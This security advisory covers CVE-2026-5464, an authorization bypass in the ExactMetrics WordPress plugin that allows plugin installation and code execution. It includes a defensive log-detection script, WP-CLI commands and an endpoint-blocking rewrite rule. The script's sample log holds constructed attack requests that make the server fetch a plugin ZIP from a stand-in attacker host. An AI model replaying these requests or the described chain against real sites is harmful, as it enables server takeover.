CVE-2026-5464 Overview
The ExactMetrics – Google Analytics Dashboard for WordPress (Website Stats Plugin) plugin for WordPress contains a critical authorization bypass vulnerability that allows authenticated attackers to install and activate arbitrary plugins from attacker-controlled URLs. This vulnerability affects all versions up to and including 9.1.2 and can lead to Remote Code Execution (RCE) on affected WordPress installations.
The vulnerability stems from a flawed authorization chain: the reports page exposes the onboarding_key transient to any user with the exactmetrics_view_dashboard capability. That key is the sole gate for a REST endpoint that returns a one-time hash (OTH) token, and the OTH token in turn authorizes an AJAX plugin-installation action that performs neither a capability check nor nonce verification.
Critical Impact
Authenticated attackers with Editor-level access or above who have report viewing permissions can install and activate malicious plugins from external URLs, achieving full Remote Code Execution on the WordPress server.
Affected Products
- ExactMetrics – Google Analytics Dashboard for WordPress (Website Stats Plugin) versions up to and including 9.1.2
- WordPress installations with the vulnerable plugin installed
- Any WordPress site where Editors or higher-privileged users have been granted report viewing permissions
Discovery Timeline
- April 23, 2026 - CVE-2026-5464 published to NVD
- April 23, 2026 - Last updated in NVD database
Technical Details for CVE-2026-5464
Vulnerability Analysis
This vulnerability represents a classic case of broken access control (CWE-862) where multiple authorization weaknesses combine to create a severe security issue. The attack chain exploits the plugin's onboarding process, which was designed to simplify plugin activation but inadvertently created a pathway for malicious plugin installation.
The attack requires network access and authentication with at least Editor-level privileges combined with the exactmetrics_view_dashboard capability. Once these prerequisites are met, the attacker can leverage the exposed onboarding_key to obtain an OTH token, which then serves as the sole credential for the exactmetrics_connect_process AJAX endpoint.
The impact is severe because this endpoint accepts an arbitrary plugin ZIP URL via the file parameter, allowing attackers to install and activate any code they control on the WordPress server.
Root Cause
The root cause of this vulnerability is the Missing Authorization (CWE-862) in the plugin installation workflow. Specifically, the exactmetrics_connect_process AJAX endpoint lacks:
- Capability checks - No verification that the requesting user has permission to install plugins
- Nonce verification - No CSRF protection to prevent request forgery
- URL validation - Accepts arbitrary external ZIP URLs for plugin installation
The onboarding_key transient is exposed to users who only need dashboard viewing capabilities, but this key unlocks functionality that should require administrator privileges. This violation of the principle of least privilege creates the authorization bypass.
Attack Vector
The attack is conducted over the network and follows a multi-step exploitation chain. An attacker must first authenticate to WordPress with at least Editor-level access and the exactmetrics_view_dashboard capability. From the reports page, the attacker extracts the exposed onboarding_key transient value.
Using this key, the attacker makes a request to the /wp-json/exactmetrics/v1/onboarding/connect-url REST endpoint to obtain a one-time hash (OTH) token. Finally, the attacker calls the exactmetrics_connect_process AJAX endpoint with the OTH token and a file parameter pointing to a malicious plugin ZIP hosted on an attacker-controlled server. The vulnerable endpoint downloads, installs, and activates the malicious plugin, granting the attacker code execution on the server.
For detailed technical analysis of the vulnerable code paths, see the WordPress Plugin Code Snippet, Onboarding Code, and Connect File Code.
Detection Methods for CVE-2026-5464
Indicators of Compromise
- Unexpected AJAX requests to exactmetrics_connect_process action from non-administrator users
- HTTP requests to /wp-json/exactmetrics/v1/onboarding/connect-url (or the equivalent ?rest_route=/exactmetrics/v1/onboarding/connect-url form, which WordPress also routes to the REST API) from Editor-level accounts
- Newly installed plugins not recognized by administrators, particularly those from external URLs
- Outbound connections from the WordPress server to unknown external hosts downloading ZIP files
Detection Strategies
- Monitor WordPress AJAX logs for exactmetrics_connect_process calls, especially those containing file parameters with external URLs
- Implement file integrity monitoring on the wp-content/plugins/ directory to detect unauthorized plugin installations
- Review WordPress activity logs for plugin activation events not initiated by administrators
- Configure web application firewalls to alert on requests to the vulnerable REST endpoints from users without plugin installation capabilities
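The following is an added example, not code from the original advisory or from the ExactMetrics project, that applies the detection strategies above to web request logs. It assumes requests are recorded in Apache/nginx combined log format, that the site's own hostname is known (SITE_HOST is an assumed placeholder), and that the AJAX action and file parameters are visible in the logged request target; if your server only sees those parameters in POST bodies, feed it the WAF or application log that records them instead. The log lines are constructed for illustration. It flags every connect_process call whose file URL points off-site, and marks the alert as a full chain when the same client fetched an OTH token from connect-url (pretty-permalink or ?rest_route= form) shortly before.

```python
"""Detect the CVE-2026-5464 exploitation chain in web request logs.

Added example (not from the original advisory or the ExactMetrics project).
Assumptions: combined log format, a known site host, and the AJAX parameters
(action, file) present in the logged request target. Sample lines are constructed.
"""
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

SITE_HOST = "shop.example.com"          # assumed: the protected WordPress site
CHAIN_WINDOW = timedelta(minutes=15)    # assumed: max gap between the two steps

# Combined log format: ip - user [time] "METHOD target HTTP/x" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
REST_PATH = "/wp-json/exactmetrics/v1/onboarding/connect-url"
REST_ROUTE = "/exactmetrics/v1/onboarding/connect-url"
AJAX_ACTION = "exactmetrics_connect_process"

# Constructed sample: a full chain, an on-site file URL (benign), a lone token
# fetch via ?rest_route=, and a connect_process call with no preceding token fetch.
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Apr/2026:10:01:02 +0000] "GET /wp-json/exactmetrics/v1/onboarding/connect-url?key=abc HTTP/1.1" 200 311 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [23/Apr/2026:10:02:30 +0000] "POST /wp-admin/admin-ajax.php?action=exactmetrics_connect_process&oth=deadbeef&file=https://evil.example.net/p.zip HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [23/Apr/2026:10:05:00 +0000] "GET /wp-admin/admin-ajax.php?action=exactmetrics_connect_process&file=https://shop.example.com/x.zip HTTP/1.1" 200 12 "-" "curl/8.0"',
    '198.51.100.20 - - [23/Apr/2026:11:00:00 +0000] "GET /index.php?rest_route=/exactmetrics/v1/onboarding/connect-url HTTP/1.1" 200 99 "-" "curl/8.0"',
    '192.0.2.5 - - [23/Apr/2026:12:00:00 +0000] "POST /wp-admin/admin-ajax.php?action=exactmetrics_connect_process&file=https://evil.example.net/q.zip HTTP/1.1" 200 88 "-" "curl/8.0"',
]


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return rec


def classify(rec):
    """Return 'connect-url', 'connect-process' or None for one parsed request."""
    q = rec["query"]
    if rec["path"].rstrip("/") == REST_PATH or q.get("rest_route", "").rstrip("/") == REST_ROUTE:
        return "connect-url"
    if rec["path"].endswith("/admin-ajax.php") and q.get("action") == AJAX_ACTION:
        return "connect-process"
    return None


def external_file_url(rec):
    """Return the 'file' parameter if it points at a host other than the site itself."""
    f = rec["query"].get("file")
    if not f:
        return None
    host = urlsplit(f).hostname
    return f if host and host.lower() != SITE_HOST else None


def detect_chain(lines):
    """Per client IP, pair a successful connect-url token fetch with a later
    connect_process call carrying an off-site file URL within CHAIN_WINDOW.
    Every off-site connect_process call is reported; 'chained' says whether
    the token fetch step was also observed from the same client."""
    last_token_fetch = {}
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        kind = classify(rec)
        if kind == "connect-url" and rec["status"] == "200":
            last_token_fetch[rec["ip"]] = rec["time"]
        elif kind == "connect-process":
            url = external_file_url(rec)
            if url is None:
                continue
            t0 = last_token_fetch.get(rec["ip"])
            chained = t0 is not None and rec["time"] - t0 <= CHAIN_WINDOW
            alerts.append({"ip": rec["ip"], "file": url, "chained": chained,
                           "time": rec["time"].isoformat()})
    return alerts


if __name__ == "__main__":
    for alert in detect_chain(SAMPLE_LOG):
        print(alert)
```

Run against the sample it reports two alerts: the 203.0.113.7 client as a complete chain and 192.0.2.5 as an unchained off-site install attempt (the token fetch may have come through a path your logs do not capture, so it is still worth reviewing). The on-site file URL from 198.51.100.9 is not reported, since the indicator is installation from an external host; drop that filter if you want every connect_process call from a non-administrator surfaced.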
Monitoring Recommendations
- Enable verbose logging for the ExactMetrics plugin and WordPress REST API endpoints
- Implement real-time alerts for any plugin installation or activation events
- Monitor for network connections to unusual external domains from the web server
- Review user capability assignments to identify Editor-level users with exactmetrics_view_dashboard permissions
How to Mitigate CVE-2026-5464
Immediate Actions Required
- Update the ExactMetrics plugin to a version newer than 9.1.2 as soon as a patched version is available
- Audit all installed WordPress plugins for unexpected or unrecognized additions
- Review and restrict which users have the exactmetrics_view_dashboard capability
- Temporarily disable the ExactMetrics plugin if an update is not yet available and the risk is unacceptable
Patch Information
Organizations using the ExactMetrics – Google Analytics Dashboard for WordPress plugin should monitor for an official security update from the plugin developers. The vulnerability affects versions up to and including 9.1.2. Check the official WordPress plugin repository and the Wordfence Vulnerability Analysis for the latest patch information and security advisories.
Workarounds
- Remove the exactmetrics_view_dashboard capability from all non-administrator users until a patch is applied
- Implement a web application firewall (WAF) rule to block requests to the /wp-json/exactmetrics/v1/onboarding/connect-url endpoint; match the REST route itself (including the ?rest_route=/exactmetrics/v1/onboarding/connect-url form) rather than only the pretty-permalink path
- Restrict AJAX access to the exactmetrics_connect_process action using server-side access controls
- Consider temporarily deactivating the ExactMetrics plugin in high-risk environments
# Workaround 1: remove the report-viewing capability from the editor role with WP-CLI
wp cap remove editor exactmetrics_view_dashboard
# Verify the removal (should print nothing once the capability is gone)
wp cap list editor | grep exactmetrics_view_dashboard
# If the plugin grants this capability dynamically from its own permissions
# settings rather than storing it on the role, the command above will not take
# effect; remove Editor from the roles allowed to view reports in the plugin
# settings instead.

# Workaround 2: block the vulnerable REST endpoint in the WordPress .htaccess.
# This matches only the pretty-permalink path; the ?rest_route= form of the
# same route reaches the endpoint without touching this rule and needs its own.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^wp-json/exactmetrics/v1/onboarding/connect-url - [F,L]
</IfModule>
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

